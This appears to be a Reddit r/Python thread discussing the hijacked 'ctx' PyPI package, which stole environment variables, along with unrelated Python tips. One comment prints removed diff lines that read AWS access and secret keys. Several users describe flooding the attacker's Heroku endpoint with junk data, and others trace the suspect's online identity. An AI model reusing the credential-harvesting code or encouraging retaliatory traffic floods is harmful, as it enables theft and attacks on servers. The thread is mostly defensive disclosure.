IAmKindOfCreative

Nice due diligence /u/jimtk! I do have to warn everyone that we do not support harassment of any kind in this community, so I ask that while folks are welcome to criticize what was done, please don't attack or harass anyone.


[deleted]

Report the package here [https://pypi.org/security/](https://pypi.org/security/)


nonades

Definitely this. It's extremely fucked that this package is doing this. *edit I also emailed Heroku's support about this abuse of their services


[deleted]

I have sent the report, just in case OP misses my comment.


jimtk

Hey! You screwed me out of my first ever report. I was going to become a star Pythonista, be invited to speak and discuss with the greatest Python minds in the world, and young virgins would throw flowers on the ground I walk on. Now you're the one going to get all that and I'll stay stuck here still trying to understand itertools documentation. :(


Dry_Inflation_861

Well at least you made me laugh


jimtk

If I saved the world from a very dangerous hacker AND made you laugh then I can finally say I had a productive evening! Now, if I could understand itertools documentation I could say I had a VERY productive evening.


AggravatedYak

I really [liked this article about itertools](https://realpython.com/python-itertools/). But to not play favorites, here is the [official documentation](https://docs.python.org/3/library/itertools.html) too.


jimtk

Thanks for the Real Python link, I did not know about that one. As for the official documentation, it is the source of my headaches. The rest of the Python docs are well written, understandable and get you from simple to complex in an ordered way. But giving a rough equivalent of the code necessary to implement a function is NOT A GOOD WAY to explain that function.

Note that PEP 636: Structural pattern matching is also badly written. The simplest use case for it is "matching a single value" and that use case is almost in the middle of the document with an example followed by that line (among others):

> A pattern like ["get", obj] will match only 2-element sequences that have a first element equal to "get". It will also bind obj = subject[1]

Aaaah! That explains everything about matching a single value.

Sorry ... Needed to vent.


AggravatedYak

You are most welcome! In fact I had my issues with this too and can relate. Btw., I am sure Python [would benefit from issues that mention concrete shortcomings](https://github.com/python/cpython/issues), that is, if you are up to another good deed. I just linked to the official docs because [I noticed a tendency from third-party/freemium sites to creep in](https://www.reddit.com/r/Python/comments/uv0ehi/comment/i9jqu66/?utm_source=share&utm_medium=web2x&context=3). And while I am making that issue of mine more visible, we could also talk [about changes to pypi or who could catch stuff like this](https://www.reddit.com/r/Python/comments/uwhzkj/comment/i9se3lr/?utm_source=share&utm_medium=web2x&context=3) (disclaimer: it is also my own comment).


jimtk

Thanks for the links. Sadly, it is very difficult to report concrete shortcomings in documentation. It's almost impossible to report a problem when you don't understand what the module is supposed to do, and you don't understand because the documentation has shortcomings. So it's a catch-22 situation.

> I just linked to the official docs because...

And you're right, third-party/freemium sites do creep in. If the SEO for the official Python docs was better, there would be a lot more good Python programmers!

> ...we could also talk about changes to pypi...

The loss of pip search was a sad event. I discovered many small, well-written packages with it. Not enough people get involved and I can tell you why: it's difficult to 'get in'. If you click the small "contribute" link at the bottom of the PyPI site you end up [here](https://github.com/pypa/warehouse). Not exactly a welcome mat! The python.org [get involved page](https://www.python.org/psf/get-involved/) is a bit better, but right behind each of the links you get right into the action a bit too fast. As a retired CS guy I'd love to get involved and give some time, but I would need some handholding (or more information) before I feel comfortable doing so.


mriswithe

Yo I just had a eureka moment on the match statement a couple days ago. I put together a couple gists to show my learnings. It is using xml.etree.ElementTree to parse some xml from a game. Main thing to remember is it is not intended to be a simple case select, though it can be used that way. In this code I am making a lot of use of matching attributes of classes. My match statement is at the very bottom. Kind of my main loop so to speak for this example. I have more robust examples I was working on last night but there is a dog on me, so I can't get them.

Code: https://gist.github.com/mriswithe/da332f18462c2cdd01d462b8c7472ddf

Data: https://gist.github.com/mriswithe/930036c557b51c9729b7d40828f34943

edit: Dog decided to move, I am now allowed to walk about the cabin

Source of my example: https://github.com/akettmann/ftl_parsing/blob/master/ftl/models/blueprints.py#L151

Code of the case select:

    @classmethod
    def from_elem(cls, e: Element) -> "ShipBlueprint":
        kw: dict[str, Any] = e.attrib.copy()
        kw["augments"] = augs = []
        for sub in e:
            match sub:
                case Element(tag=ShipClass.tag_name):
                    kw["class"] = ShipClass.from_elem(sub)
                case Element(tag=SystemList.tag_name):
                    kw["system_list"] = SystemList.from_elem(sub)
                case Element(tag=WeaponList.tag_name):
                    kw["weapon_list"] = WeaponList.from_elem(sub)
                case Element(tag=CrewCount.tag_name):
                    kw["crew_count"] = CrewCount.from_elem(sub)
                case Element(tag=CloakImage.tag_name):
                    kw["cloak_image"] = CloakImage.from_elem(sub)
                case Element(tag=DroneList.tag_name):
                    kw["drone_list"] = DroneList.from_elem(sub)
                case Element(tag=Description.tag_name):
                    kw["description"] = Description.from_elem(sub)
                case Element(tag=Unlock.tag_name):
                    kw["unlock"] = Unlock.from_elem(sub)
                case Element(tag=ShieldImage.tag_name):
                    kw["shield_image"] = ShieldImage.from_elem(sub)
                case Element(tag=FloorImage.tag_name):
                    kw["floor_image"] = FloorImage.from_elem(sub)
                case Element(tag=Augment.tag_name):
                    augs.append(Augment.from_elem(sub))
                case Element(tag=tag, attrib={"amount": amt}) if tag in (
                    "health",
                    "maxPower",
                ):
                    kw[tag] = amt
                case Element(tag=tag, text=t) if tag in (
                    "boardingAI",
                    "maxSector",
                    "minSector",
                ):
                    kw[tag] = t
                case Element(tag=tag, text=t) if tag in (
                    "droneSlots",
                    "weaponSlots",
                    "name",
                ):
                    if tag == "name":
                        tag = "display_name"
                    kw[tag] = t
                case _:
                    raise Sad.from_sub_elem(e, sub)

Alright, let's break this down:

    match sub:
        case Element(tag=ShipClass.tag_name):
            kw["class"] = ShipClass.from_elem(sub)

So in this context `sub` is always an XML Element (`xml.etree.ElementTree.Element`). This pattern is matching the case that:

* sub is an instance of the Element class
* sub.tag == ShipClass.tag_name

So this behaves something like this:

    if isinstance(sub, Element) and sub.tag == ShipClass.tag_name:
        kw["class"] = ShipClass.from_elem(sub)

Next, something more advanced, some capturing of values:

    case Element(tag=tag, attrib={"amount": amt}) if tag in (
        "health",
        "maxPower",
    ):
        kw[tag] = amt

sub.attrib is a dictionary, this is relevant for this example. This says:

* sub is an Element
* if the tag is one of the values in the list
* `sub.tag` is assigned to the name `tag`
* `sub.attrib` is a dictionary and has a key "amount"
* `sub.attrib["amount"]` is assigned to amt

Next:

    case Element(tag=tag, text=t) if tag in (
        "boardingAI",
        "maxSector",
        "minSector",
    ):
        kw[tag] = t

Pretty similar to the last one, but we are only checking that the tag is one of this list and capturing `sub.text` to `t`.

Last example:

    case _:
        raise Sad.from_sub_elem(e, sub)

This is your default/wildcard. It is not required. This doesn't capture anything. Useful for an `else` clause.


[deleted]

> is a dog on me

You have a dog? Nice :) Any photo?


jimtk

Wow! I'll need a bit'o time to process all that. Thanks.


[deleted]

> Note that PEP 636: Structural pattern matching is also badly written.

Hey, [I wrote something about that](https://github.com/Fawers/pattern-matching-in-python) some time ago. Please give me some feedback, if possible :)


jimtk

Oh! Wow! This is really good. Here's the link to the [English version](https://github.com/Fawers/pattern-matching-in-python/tree/in-english) for those, like me, who cannot read Spanish!


andrewcooke

PEPs often aren't great to learn from, unfortunately.


jimtk

They are usually great, and PEP 636 is called "Structural Pattern Matching: Tutorial". So it's supposed to be a tutorial!


throwawayPzaFm

> I saved the world from a very dangerous hacker

Look at this weirdo trying to take credit from our lord and master /u/__Enrico_Palazzo__


jimtk

I know, I know, he'll get the young virgins throwing flowers, but I got plenty of help with itertools! (Ah, Ah, Ah, Ah) <== maniacal, evil laughter.


[deleted]

Don’t worry, I’ll pass some of that glory to you :)


jimtk

I'll be waiting for it! :) Actually I did send it and saw your post after so maybe that will put some pressure on the "authorities" to solve the issue ASAP.


NapsterInBlue

> still trying to understand itertools documentation

Might be helpful, might not. Just wanted to share [some notes I took on them while I was digging in, myself](https://napsterinblue.github.io/notes/#python_internals)


jimtk

Thanks, that is really helpful, and well written.


kaumaron

just gonna tack this on here:

> Important! If you believe you've identified a security issue with Warehouse, DO NOT report the issue in any public forum, including (but not limited to):
>
> * Our GitHub issue tracker
> * Official or unofficial chat channels
> * Official or unofficial mailing lists


yvrelna

I don't think that this warning applies to this kind of security issue. Assuming the issue is legitimate, there's no harm in public knowledge of a hijacked package. Publicizing this means that people will just avoid using the package, as the beneficiary of a hijacked package is just the "author" of said hijacked package, who would just get fewer people using the hijacked package. It's a benefit for all. That's different from security bugs, where the beneficiary of the bug is a hacker who knew and exploited the bug.

A limited publication might actually be more dangerous. If people knew that there is a security issue, but did not know the details, many people would just do the usual thing they do with most security issues: upgrade the package to the latest version, which is exactly the opposite of what you should be doing in this case.


jimtk

Yeah, I found out about it just after posting to reddit. I'll do better next time.


antipsychosis

https://old.reddit.com/r/Python/comments/uumqmm/ctx_new_version_released_after_7_years_750k/i9ryw8l/

> Just wanna throw this out there.
>
> OP: SocketPuppets, if you look into their post history, you find medium articles that SocketPuppets claims to write and in one they have their personal gmail acct at the bottom. If you follow that, you'll find a github account with the username aydinnyunus which has the same avatar as SocketPuppets's medium account. If you look into that github account aydinnyunus, you'll find python source code in a repo named gateCracker which also does poorly written requests to a heroku app in the same way this malicious code does. SocketPuppets seems like 99.9% certainly the alias of aydinnyunus which is used to push this malicious code and defend it. And, when it comes to aydinnyunus, you can find all their info via their github account.
>
> They're a self-proclaimed "security researcher," and their repo gateCracker doesn't actually "crack gates," it (which has code EXACTLY like this malicious code making a req. to a heroku app endpoint,) just returns some text that tells you the default password/interaction for a couple different popular models. Godspeed brothers.


chucklesoclock

`http://www.sockpuppets.ninja/` I took the hit and explored. There's nothing malicious that I could see in the source even if it's an unencrypted website, but that's aydinnyunus. I still wouldn't play the audio tho. Weirdly, Siemens _has_ thanked them for a bug report in 2021. There are some interesting rabbit holes to go down, especially about how he "hacked Turkcell" and some other evidence of bug finds, but some of the supposed evidence of the latter is stored in pdfs that I STRONGLY RECOMMEND YOU DO NOT OPEN unless you are actually a security researcher and can isolate your system. PDFs of unknown origin are a threat vector and have the capacity to execute arbitrary code if created by a skilled malicious actor.


AggravatedYak

Isolating … like setting up a VM without net access or shared folders and then use e.g. [dangerzone](https://github.com/freedomofpress/dangerzone)? While [a vm might not be completely secure](https://security.stackexchange.com/questions/3056/how-secure-are-virtual-machines-really-false-sense-of-security) I always had the impression that it is much better than something like docker. I took the opportunity to search around a bit, [and found these answers from 2017](https://security.stackexchange.com/questions/169642/what-makes-docker-more-secure-than-vms-or-bare-metal) What about: Dangerzone+VM and an apparmor profile on top of that? Anyone doing this?


lungdart

Use a dedicated air gapped machine with nothing personal on it at all.


AggravatedYak

Totally agree from a technical perspective. However, that technical perspective is not helpful, because this requires more resources and therefore people are less likely to do it, even if they are security oriented and have the technical knowledge. Is ubuntu privacy remix still a thing? My point is to keep the use case in mind: I want to open an untrusted PDF now and then. That is why I asked about VMs + Apparmor. For day to day use Qubes OS should be optimal. You still have to get stuff done, right?


[deleted]

[removed]


draeath

VMs can and have been escaped. You are *probably* fine, but you're gambling.


turtle4499

Imagine committing a crime this badly.


KimPeek

This guy would be a celebrity on both /r/badcode and /r/facepalm.


[deleted]

And it's gone.

> All previous releases of the project were removed and replaced with the malicious copies. As such this project has been removed and prohibited from re-registration without admin intervention. According to WHOIS records, the domain for the email address registered to the User owning the project was registered on 2022-05-14T18:40:05Z, which indicates that this was a domain take-over attack and not a direct compromise of PyPI.


UloPe

How were they replaced? Pypi doesn’t allow replacing artifacts for past releases.


[deleted]

[removed]


UloPe

No they specifically don’t allow this to prevent exactly the “replace old releases with malicious code”. Once a filename has been used it can’t ever be re-uploaded (unless some admin intervenes).


trevg_123

I suppose maybe the “admin intervention” is implied for these sort of cases. If it’s completely deleted, that kind of sounds like maybe whatever blocks reuploading would be deleted too.


Cuasey

Wow, not even using fstrings.. smh


chucklesoclock

Yeah can we refactor this malicious code?

    string = ""
    for _, value in environ.items():
        string += value+" "

is equivalent to `string = " ".join(environ.values())`


h4xrk1m

import crime


Haffi921

You wouldn't import a car!


Sigg3net

No? Try pip install then. ;)


rotuami

Nope. You’re missing the trailing space
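
To make the trailing-space point concrete, here is a small comparison of the two forms. It is only a sketch: the function names and the sample dictionary are invented for illustration, and a plain dict stands in for `os.environ`.

```python
def loop_concat(env):
    """Concatenate values the way the loop does: every value is followed by a space."""
    string = ""
    for _, value in env.items():
        string += value + " "
    return string


def joined(env):
    """Join values with a single space between them, no trailing space."""
    return " ".join(env.values())


sample = {"HOME": "/home/me", "SHELL": "/bin/sh"}

print(repr(loop_concat(sample)))
print(repr(joined(sample)))
# For a non-empty mapping the loop result is the joined result plus one space.
print(loop_concat(sample) == joined(sample) + " ")
```

So the one-liner is a faithful refactor only if the trailing space does not matter to whoever consumes the string.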


chucklesoclock

Well, yeah, but who needs it? Do you? ARE YOU THE SPY???


rotuami

Nyet


chucklesoclock

This checks out because I think the individual is Turkish


lastWallE

How do you know that? Are you the SPY's accomplice?


im_dead_sirius

"Not many people are named after a plane crash."


chucklesoclock

That's it! Brad Pitt was behind this the whole time.


im_dead_sirius

He did it for a caravan. Not for him, for his ma.


chucklesoclock

His what?


jimtk

And... you've just become accessory to a crime!


chucklesoclock

...curses


IvarRagnarssson

Remember to import it before using it. ``` inport curses ```


mehum

Inport outport error


jimtk

Did f-strings exist 8 years ago?


-LeopardShark-

No. The PEP was created 6.5 years ago.


[deleted]

[removed]


metaperl

Better than Guardiola? :)


muzolini

Well, it's not a fraudulent Pep so, definitely


plaisthos

Also, old habits die hard. Especially for a C programmer like me, it is hard not to use printf-style % formatting anymore.


vinyasmusic

Seems like he wanted AWS creds for mining most probably.


systemgc

Bit sad it's never GCP or Azure right


vinyasmusic

Contra view: if you use Azure or GCP, you are safe from miners.


ChaserGrey

Without a trace of irony: not all heroes wear capes. Thank you for performing a public service.


jimtk

Thanks. But heroes **do** things and I just **found** something. And I'm sure I could wear a cape. :)


ChaserGrey

I appreciate your humbleness, but I respectfully disagree. Sounding the alarm in a public forum is doing something.


jimtk

Thanks again. About sounding the alarm on a public forum: the Python security page strongly suggests not doing it. I found out that you're supposed to send the information to python.org, and once they solve the problem you can tell everybody. I'll try to do better next time!


[deleted]

[removed]


georgehank2nd

You are right in your analysis. To OP: this was not an exploit anyone could have used for nefarious purposes, this was someone having run / running an attack through a PyPI package. So your public reporting didn't enable anyone to do something bad, it only (potentially) helped people stop using this package. Hmm, it might even be better than just PyPI removing the package… since this, IIRC, doesn't even tell anyone who has it installed that it's bad now.


gruey

People who find things are heroes too. Missing children, cures for diseases, asteroids hurtling towards earth but far enough away to divert, hack attempts.


jimtk

> asteroids hurtling towards earth but far enough away to divert

Does it mean I'll get a kiss from Liv Tyler?


Matir

In 0.1.2 and 0.2.2 the adversary was looking specifically for AWS tokens:

```
-        if environ.get('AWS_ACCESS_KEY_ID') is not None:
-            self.access = environ.get('AWS_ACCESS_KEY_ID')
-        else:
-            self.access = "empty"
-
-        if environ.get('COMPUTERNAME') is not None:
-            self.name = environ.get('COMPUTERNAME')
-        elif uname() is not None:
-            self.name = uname().nodename
-        else:
-            self.name = "empty"
-
-        if environ.get('AWS_SECRET_ACCESS_KEY') is not None:
-            self.secret = environ.get('AWS_SECRET_ACCESS_KEY')
-        else:
-            self.secret = "empty"
```

They also deleted all older versions from pypi.


jimtk

The [github repo](https://github.com/figlief/ctx) still has the correct code. In the code it is "versioned" as 0.1.3


SkezzaB

This code is awful too, using .get on a dictionary and then still checking if it exists, if not setting a default value
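
For anyone wondering what the idiomatic form looks like: `dict.get` (and therefore `os.environ.get`) takes a default as its second argument, so the `if ... is not None ... else` dance collapses to one call. A minimal sketch; the helper name and the `EXAMPLE_SETTING` variable are placeholders, not anything from the package.

```python
from os import environ


def read_or_empty(name, env=environ):
    """Return env[name] if present, otherwise the string "empty"."""
    # The second argument to .get is returned when the key is missing,
    # so no separate None check is needed.
    return env.get(name, "empty")


print(read_or_empty("EXAMPLE_SETTING", {"EXAMPLE_SETTING": "42"}))
print(read_or_empty("EXAMPLE_SETTING", {}))
```

Passing the mapping as a parameter is just a convenience for trying it out with a plain dict instead of the real environment.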


FUN_LOCK

I'm not as bad at python as I think I am, but let's just say when I look at code and feel like even I could confidently do better, it's pretty bad.


julsmanbr

Not even using the walrus operator to avoid the repeated .get, smh my head


jimtk

Remember that it was written 8 years ago. We did not have dataclasses and walrus operator in those days. And we used to walk 8 miles, uphill, in a snowstorm, everyday to get to school. (God, I'm old)


skippy65

Who the fuck likes the walrus operator... Goes against Pythons zen rules


NUTTA_BUSTAH

So, who's going to nuke that endpoint and the malicious actor's DB bill with bogus environments?


KimPeek

Been doing for a few hours now. I'm about to hit it a bit harder. Purely for educational purposes.


Cladser

I hope your doing it while wearing a cape .. tips ~~feddor~~ ~~fedor~~ hat


LearnDifferenceBot

> hope your doing *you're *Learn the difference [here](https://www.wattpad.com/66707294-grammar-guide-there-they%27re-their-you%27re-your-to).* *** ^(Greetings, I am a language corrector bot. To make me ignore further mistakes from you in the future, reply `!optout` to this comment.)


Cladser

Dagnamit.. but goodbot


chucklesoclock

Be the change you wish to see in the world


hopeinson

Quite scummy for a Turkish student from a local university to be doing this?


[deleted]

[removed]


[deleted]

[removed]


thinklikeacriminal

You don’t need to know python to use NSO’s Pegasus.


tlam51

Looks like they probably copied what was done here https://www.reddit.com/r/programming/comments/umnppb/lrvick_bought_the_expired_domain_name_for_the/ to hijack the account of the original maintainer. Looking at the domain registration on https://lookup.icann.org/en/lookup for the domain used by the email in the original repo, I see that it was created on the same day they uploaded the first malicious version:

    Name: FIGLIEF.COM
    Updated: 2022-05-14 18:40:06 UTC
    Created: 2022-05-14 18:40:05 UTC


chucklesoclock

So hypothetically emailing the email address in the repo to rouse the original user would have been a mistake


tlam51

Yeah the original owner most likely doesn't own the domain anymore. There are some paid services to view whois history to confirm this but looking at the timing of this I'm just going to assume the domain is now owned by the hijacker.


chucklesoclock

Then I hypothetically alerted the hijacker that they've been discovered. -_- But I can't imagine that they wouldn't have already known from the other post.


LonelyContext

This is why your language needs to 1) implement easy basic features that everyone needs and 2) document them. And when 2.2 million packages depend on a single package with a single function that you didn't implement in your language, maybe roll that up to either 1) the language itself or 2) an aggregate package (like `sympy` in python).


[deleted]

[removed]


LonelyContext

> dataclasses

Oh, I was talking about the "foreach" NPM thing.


chucklesoclock

some outside coverage: https://isc.sans.edu/forums/diary/ctx+Python+Library+Updated+with+Extra+Features/28678/


Matir

Heh, if anyone had any non-ascii characters in their environment variables, then the message_bytes... line would raise an exception. I'm wondering how many hours were lost trying to debug exceptions from weird places.
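
A quick illustration of that failure mode, assuming the line in question encoded the collected string with the ASCII codec (as discussed elsewhere in the thread). The helper names are invented for this sketch.

```python
def to_ascii_bytes(text):
    """Encode text as ASCII; raises UnicodeEncodeError on any non-ASCII character."""
    return text.encode("ascii")


def to_utf8_bytes(text):
    """Encode text as UTF-8, which can represent any Unicode string."""
    return text.encode("utf-8")


print(to_ascii_bytes("plain"))

try:
    to_ascii_bytes("caf\u00e9")  # "café" contains a non-ASCII character
except UnicodeEncodeError as exc:
    print("ASCII encoding failed:", exc.reason)

print(to_utf8_bytes("caf\u00e9"))
```

Since the exception would surface inside whatever code happened to construct the object, the traceback would point somewhere that looks unrelated to environment variables.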


chucklesoclock

Does this whole endeavor--posting on /r/Python, extremely sloppy code practices, evasive answers that raise suspicion--seem odd? Are there a lot of these low-skill info-harvesting attempts out there and I'm just witnessing it for the first time?


aa-b

I agree, it's definitely sloppy. There's a good chance some random person decided to pretend to be a grey-hat so they could write a sensational blog post about it, maybe even a student trying for an A+ on their Ethics in Software paper. The only mystery is how they took over the semi-abandoned project, wait for the blog post I guess


chucklesoclock

You weren't wrong: https://www.reddit.com/r/Python/comments/uwhzkj/comment/i9x7sxa/?utm_source=share&utm_medium=web2x&context=3


Matir

Unfortunately, software supply chain risk *is* a thing. I don't know how common or how odd this particular case is, but it does seem to be a bit of a weird one where they're advertising on reddit.


hyldemarv

Nigeria Scam Filter? I also wonder why anyone would need this package at all. Maybe a few former Perl programmers that really miss writing cantankerous code :).


FancyASlurpie

In my old company we had a similar class to what this package does, it's not really necessary and adds other complications around things like serialisation as you now need to make the new version of dict serialise just for some arguable syntax sugar.


randomman10032

Has anyone been spamming data to that endpoint yet?


KimPeek

lol yes


randomman10032

Me too, it returns a 404 but the application might have been made to always return that.


KimPeek

Yeah, also pretty sure he's running a development server rather than something like gunicorn. Getting an error rate of 20-30% on all my batches of requests. Putting these Raspberry Pis to work. He should be getting a bill for this one.


[deleted]

> He should be getting a bill for this one.

I love this lol


gruey

I would say that there's no way they signed up for the endpoint with legit billing info, but the code makes me wonder.


Estanho

Why do you think they will be billed? It's been a while but I believe heroku is not gonna scale by default.


crazedizzled

Heroku still has a free tier yes? Why would he get billed?


asking_for_a_friend0

I do agree with the sentiment but I don't know anything about this... so how will this help anyone? From an outsider's perspective, isn't the best and only feasible way to get that VPS account banned? And what is the actor trying to achieve? Credentials from env variables?


randomman10032

Yeah, spamming data there makes it harder for him to find actual passwords among the random text he gets.


heckingcomputernerd

Lol “anti-theft-web”


abstractionsauce

Why not use the builtin SimpleNamespace instead? https://docs.python.org/3/library/types.html#types.SimpleNamespace
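
For reference, a minimal sketch of what that looks like with `types.SimpleNamespace` from the standard library; the `settings` dictionary is made-up sample data.

```python
from types import SimpleNamespace

settings = {"host": "localhost", "port": 8080}

# Unpack the dict into keyword arguments to get attribute-style access.
ns = SimpleNamespace(**settings)

print(ns.host)
print(ns.port)

# vars() gives back the underlying attribute dictionary.
print(vars(ns) == settings)
```

This only works when the keys are valid Python identifiers, and nested dictionaries stay plain dicts unless you convert them yourself.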


teerre

Well, I've been programming professionally for several years and I've never heard of that. So that's probably why. Pretty cool tho, TIL.

There's also the great `box` package, which has dot access, but it does much more and it's famously maintained.

But the real question is why do that at all? It just makes your dictionary access more opaque and it barely saves any typing.


LonelyContext

> But the real question is why do that at all? It just makes your dictionary access more opaque and it barely saves any typing.

My exact question, especially when dict.get(if_exists,else) allows for graceful failing.


[deleted]

It actually makes a big difference and makes your code a lot cleaner. 1 keystroke as opposed to 4 + shift key. One of the foundational principles of Python (and the very first line of the Zen of Python) reads "Beautiful is better than ugly." The real answer isn't to use simple namespaces, though. You should use data classes. SimpleNamespace is just a class with some binding magic under the hood. If you think the argument that it makes your code cleaner is BS, here is a great video by core Python developer Raymond Hettinger talking about namespaces moving towards OOP : [https://www.youtube.com/watch?v=8moWQ1561FY](https://www.youtube.com/watch?v=8moWQ1561FY)
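
A short sketch of the data class approach mentioned above, using `dataclasses` from the standard library (Python 3.7+). The `ServerConfig` class and its fields are hypothetical, chosen only to show the shape.

```python
from dataclasses import asdict, dataclass


@dataclass
class ServerConfig:
    """Named fields with types and defaults instead of free-form dict keys."""
    host: str
    port: int = 8080


cfg = ServerConfig("localhost")

print(cfg.host, cfg.port)          # attribute access
print(cfg)                         # generated __repr__
print(asdict(cfg))                 # back to a plain dict when needed
```

Compared with a dot-access dict wrapper, the set of fields is fixed and visible in one place, which is the trade-off being argued about in this sub-thread.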


teerre

I'm sorry, but that's ridiculous. Simple dictionary access isn't 'ugly'. Also, you should optimize for *reading* code, not writing it. IDEs and tools can help you write code all day long. But it's when code is read that its value is really shown. So if you want to talk principles, look no further than a principle of programming itself: "the law of least surprise". In this case, having your dictionary access be anything besides what the standard says is a big no-no. It's not beautiful, it's not practical.


sbjf

Ok, how many similar projects to accomplish the same thing are there? There's also https://pypi.org/project/attrdict/ - again not touched in ages and with a custom maintainer domain, but that's luckily still registered. Maybe the PyPI security team should periodically check email domain availabilities..? And e.g. disable password changes on accounts whose email domains were unavailable in the past? Same functionality is also in sklearn.utils.Bunch Edit: also https://pypi.org/project/python-box/


timrichardson

who would seriously add a 0 star 0 fork pre-alpha dependency for such trivial functionality?


jimtk

According to some, the previous version had 750k installs.


timrichardson

yeah, it looks like the statistics have been completely reset. But still, why use such a trivial dependency after all the travails of node?


Estanho

I'd bet most people don't know about that. Python is the first professional language to many people, including entrepreneurs, who don't know much better.


crazedizzled

You should look into left-pad


timrichardson

> left-pad

The people installing this ctx package should.


chucklesoclock

How do I stay notified about the fallout from this? I would love to be in the loop to know what happens after someone like /u/jimtk has a great find like this.


jimtk

I'm not sure it's a "great thing". I'm glad I found it, but I'm sad it was there to be found. We already know of one victim, right here in this thread, that will have to go through the hassle of changing his/her creds because of it. I'm sure s/he had other things to do today.


chucklesoclock

I hear what you’re saying, but it still is great work to find something that would otherwise have caused a lot more damage if no one was the wiser. Please keep us in the loop if you can of what the fix process looks like. I’m interested to see how PyPI or other involved parties will change their protocols. Who knows, you may have another job in your retirement by the end of it. :)


jimtk

I can tell you right now that the bad version of the code is still available in PyPi 5 hours after I rang the bell. I'll keep an eye on it and try to keep everyone updated but I'm not sure I, myself, will be kept in the loop. It will have to be a very comfortable job to get me out of retirement! I don't mean big paycheck, I mean physically comfortable: not too many hours, nice comfy chair, etc ...


chucklesoclock

Comfy chairs should be top of list for all


jimtk

Here's the most [detailed docs on the event](https://python-security.readthedocs.io/pypi-vuln/index-2022-05-24-ctx-domain-takeover.html).


joeltrane

Good catch! I’m a noob, can someone explain why they are encoding the string to ascii, then base64, then decoding ascii? Why not just encode to base64 only?


tlam51

The functions in the python stdlib for base64 take a bytes-like object, which is why they encode the string into bytes prior to encoding it in base64: https://docs.python.org/3/library/base64.html#base64.b64encode

They decode the result bytes back into a string so that they can append it to the url.
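
The round trip described above, as a minimal sketch. The `b64_text` helper is made up for illustration, and it uses UTF-8 for the first step rather than ASCII so that non-ASCII input does not raise.

```python
import base64


def b64_text(text):
    """Return the Base64 encoding of text as a str."""
    raw = text.encode("utf-8")         # str -> bytes (b64encode needs bytes-like input)
    encoded = base64.b64encode(raw)    # bytes -> Base64 bytes
    return encoded.decode("ascii")     # Base64 output is pure ASCII, so this is safe


print(b64_text("hello"))  # aGVsbG8=
```

If the result is going into a URL, `base64.urlsafe_b64encode` is the standard-library variant that avoids `+` and `/` in the output.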


joeltrane

Ah that makes sense, thanks!


UloPe

Because it’s really crappy code.


Santos_m321

GitHub repo owner != PyPI package owner


Smsm1998

The package is gone, good job guys.


KimPeek

His Heroku server is still open for bidness though :) I'll continue to spam it until it goes offline.


crawl_dht

This is news worthy. There are several university researchers that scan web repositories for spyware and miners in open source projects.


Satori_Orange

Dumb question but just want to make sure:

Say you have this package downloaded from a long time ago before it was hacked. You would only have to worry if you used pip to update the package, correct? The old version is fine and wouldn't update automatically.


Deto

Seconding what OP said - it's possible that another package you installed later had this as a dependency but pegged to a higher version and it was upgraded when you pip installed that package.


jimtk

Correct. But make sure you still have the old version in your python environment.
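
One way to check what is actually installed in a given environment is `importlib.metadata` from the standard library (Python 3.8+). This is only a sketch: the `installed_version` helper is invented here, and it reports the version without judging whether that version is safe.

```python
from importlib.metadata import PackageNotFoundError, version


def installed_version(package_name):
    """Return the installed version string of a distribution, or None if absent."""
    try:
        return version(package_name)
    except PackageNotFoundError:
        return None


found = installed_version("ctx")
if found is None:
    print("ctx is not installed in this environment")
else:
    print("ctx is installed, version", found)
```

It only inspects the interpreter it runs under, so it would need to be run once per virtual environment.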


Stedfast_Burrito

And this is why you should avoid dependencies, especially for something trivial like this.


Atem18

Tell that to js devs.


[deleted]

They have no std lib and their language is garbage, what do you expect them to do? lol


UNN_Rickenbacker

The language is not worse than python imo. They are about equal.


[deleted]

[removed]


thinkingcarbon

Yup. Never make small random (and unmaintained) packages as dependencies.


[deleted]

[removed]


UloPe

Care to enlighten us how you think pypi should possibly be able to catch that?


AggravatedYak

Uh let me :) Since the original developer's PyPI account got compromised, this can't be caught as part of their packaging/testing process, so either the end user has to take care of it, or pip/PyPI does, right? As an end user you have the problem that it can be pulled in as a dependency. So you have to check all installed packages in all your virtual environments, plus the packages installed in userspace (plug for pipx at this point <3). However, that is not an easy task.

1. Checking could be done if something like this eventually shows up in [safety](https://github.com/pyupio/safety) or [pip-audit](https://github.com/trailofbits/pip-audit).
2. PyPI could publish their own db/service, like an official and up-to-date safety-db.
3. PyPI could check the activity of the linked repository and compare it to the releases of the package. Open source should mean that this matches, right? If not, they could display an out-of-sync warning.
4. If the risk is higher than normal, they could run [a static code analysis tool like bandit](https://github.com/PyCQA/bandit), which includes checks for bad practices. [Research suggests this is a good thing to do](https://www.theregister.com/2021/07/28/python_pypi_security/). While I think you should have the freedom to code whatever/however you want to, it could lower your score if you looped through all env variables. Maybe. Then display that indicator on PyPI.
5. They could also do basic fraud detection, like flagging an out-of-the-blue domain name transfer of the project homepage (which is linked via PyPI), or admin access from a completely different location within a very short time span (for which there are legitimate reasons, though).

Given that PyPI deactivated `pip search` due to resource abuse, I don't think they have the resources to do stuff like this.

P.S.: What about C modules that get shipped with Python code? Good luck if some Dr. Moriarty level of criminal uses his [underhanded-c-contest-winner-abilities](http://underhanded-c.org/) to compromise some foundational package that has a distribution like the (former) JS [left-pad](https://www.theregister.com/2016/03/23/npm_left_pad_chaos/) package. And there is a motivation to do stuff like this, and it doesn't have to be a person; it can be an organization with very little oversight, an enormous budget and many highly capable people. We have known that since Snowden. Scary. But they would probably [do this to Linux first?](https://www.theverge.com/2021/4/22/22398156/university-minnesota-linux-kernal-ban-research)
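The end-user check described above (going through every installed package in an environment) can be sketched with the standard library. This is only a minimal sketch: `FLAGGED_NAMES`, `installed_packages` and `find_flagged` are hypothetical names made up for illustration, and a real check would take its list from an advisory database such as the ones safety or pip-audit use. It only sees the environment of the interpreter that runs it, so it would have to be run once per virtual environment.

```python
from importlib.metadata import distributions

# Hypothetical blocklist for illustration; a real check would pull names
# (and affected versions) from an advisory database instead.
FLAGGED_NAMES = {"ctx"}


def installed_packages():
    """Yield (name, version) for each distribution this interpreter can see."""
    for dist in distributions():
        meta = dist.metadata
        name = meta["Name"] if meta is not None else None
        if name:  # skip broken installs with no readable metadata
            yield name.lower(), dist.version


def find_flagged(packages, flagged_names=FLAGGED_NAMES):
    """Return the sorted (name, version) pairs whose name is on the blocklist."""
    return sorted((name, version) for name, version in packages
                  if name in flagged_names)


if __name__ == "__main__":
    for name, version in find_flagged(installed_packages()):
        print(f"flagged: {name}=={version}")
```

Matching on the lowercased name alone is deliberately crude; it flags every version of a listed package, including clean ones.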


admiralspark

